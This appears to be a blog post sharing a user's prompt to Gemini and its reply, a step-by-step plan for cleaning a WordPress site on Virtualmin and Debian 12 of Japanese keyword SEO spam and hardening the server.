This is an example of how cleaning a site can be accomplished using artificial intelligence. Following is the prompt I used with Gemini (not showing the actual domain name of the site) after I used the Sucuri site to determine the site contained malware:
One of the sites on my server started using a lot of bandwidth and upon checking with Sucuri it shows as being infected by malware:
https://sitecheck.sucuri.net/results/domain.comThe malware it appears to be infected with is described here:
https://labs.sucuri.net/signatures/sitecheck/spam-seo/?japanese.2The customer said she hired someone to boost her SEO and keywords and drive more traffic to her site and all but after working with him a while she couldn’t undertand his English so she stopped working with him.
The site is not listed anywhere (like Google or in Firefox) as infected or dangerous.
Can you give me a plan in the form of a descriptive article to clean her WordPress site in Virtualmin on Debian 12 of this?
The raw output (with the exception of the actual domain name) follows.
Gemini Raw Output
It sounds like your client’s site has fallen victim to a Japanese Keyword Hack. This is a common and aggressive SEO spam attack where thousands of pages of auto-generated Japanese text (often promoting counterfeit goods or gambling) are injected into the site. Because these pages are designed to be seen by search engine bots rather than human users (cloaking), they often go unnoticed until bandwidth spikes or search rankings plummet.
Since the site is hosted on Virtualmin (Debian 12), you have full root access, which makes the cleanup much more effective than on shared hosting.
Here is a comprehensive plan to sanitize the WordPress installation and harden the server.
Cleaning the Japanese SEO Spam Malware: A Step-by-Step Guide
1. Pre-Cleanup Preparation
Before touching the code, ensure you have a “safety net.”
-
Full Backup: Use Virtualmin’s backup feature to create a snapshot of the virtual server (Files + Database).
-
Go Offline: Install a “Maintenance Mode” plugin or use an
.htaccessrule to redirect traffic. This prevents the malware from potentially executing further scripts while you work.
2. Identify the Entry Point
The “SEO specialist” the client hired likely had admin credentials or FTP access.
-
Check Users: In the WordPress Dashboard, look for unrecognized Administrator accounts.
-
Virtualmin Logs: Check the access logs at
/var/log/virtualmin/domain.com_access_log. Look for suspiciousPOSTrequests to unknown.phpfiles or unusual activity from foreign IP addresses around the time the “specialist” was active.
3. Core WordPress Reinstallation
Malware often modifies core WordPress files. The cleanest way to fix this is to replace them entirely.
-
Connect via SSH or use the Virtualmin File Manager.
-
Delete the
wp-adminandwp-includesdirectories. -
Delete all
.phpfiles in the root directory (exceptwp-config.php). -
Download a fresh copy of WordPress from WordPress.org and upload the new
wp-admin,wp-includes, and root.phpfiles.
4. Sanitizing the wp-content Folder
This is where the malware usually hides.
-
Plugins: Delete the entire
/wp-content/plugins/directory and reinstall them from the WordPress repository. Do not “update” them; delete and replace. -
Themes: If using a stock theme, delete and reinstall. If it’s a custom theme, manually inspect the
functions.phpand header/footer files for base64 encoded strings oreval()functions. -
Uploads: Check
/wp-content/uploads/. There should be no .php files here. Use the terminal to find them:Bash
find /home/linuxusername/public_html/wp-content/uploads -name "*.php"If any appear, delete them immediately.
5. Cleaning the .htaccess and index.php
Japanese SEO spam heavily relies on the .htaccess file to rewrite URLs for the fake pages.
-
Open your
.htaccessfile. If you see complex rules redirecting to strange files, delete them. Revert to the standard WordPress .htaccess. -
Check the root
index.php. It should only contain the standard WordPress bootstrap code.
6. Database Sanitization
The “Japanese keywords” are often stored in the wp_posts table or injected into the wp_options table.
-
Log into phpMyAdmin or use the Virtualmin database tool.
-
Search the
wp_poststable for Japanese characters or titles related to the spam keywords. -
Check the
wp_optionstable forsiteurlorhomechanges.
7. Virtualmin/Debian Level Hardening
Since you are on Debian 12, take advantage of system-level security:
-
Update System: Ensure Debian is patched:
apt update && apt upgrade. -
Change All Credentials: Change the Virtualmin user password, the MySQL database password (update
wp-config.phpaccordingly), and all WordPress admin passwords. -
Permissions: Ensure files are owned by the Virtualmin user and permissions are set correctly (644 for files, 755 for directories).
Bash
chown -R linuxusername:linuxusername /home/linuxusername/public_html
8. Handling Search Engine Results
Even after the site is clean, Google may still have thousands of Japanese pages indexed.
-
Google Search Console: Register the site immediately.
-
Sitemap: Generate a new, clean XML sitemap and submit it.
-
Removals Tool: Use the “Removals” tool in Search Console to temporarily hide the spam URLs.
-
404 Errors: The spam URLs will now lead to 404 pages. This is good. Eventually, Google will see the pages are gone and drop them from the index.
9. Ongoing Protection
-
Install a Security Plugin: Wordfence or Sucuri’s plugin can provide a firewall and scheduled scanning.
-
Disable File Editing: Add
define( 'DISALLOW_FILE_EDIT', true );to yourwp-config.phpto prevent even admins from editing code through the dashboard. -
Fail2Ban: Ensure Fail2Ban is active in Virtualmin to block brute-force attempts on SSH and WordPress logins.
Summary: You are essentially performing a “surgical replacement.” By replacing the core, plugins, and themes while auditing the uploads and .htaccess, you remove the malware’s ability to run. The rest is simply convincing Google that the “new” site is the legitimate one.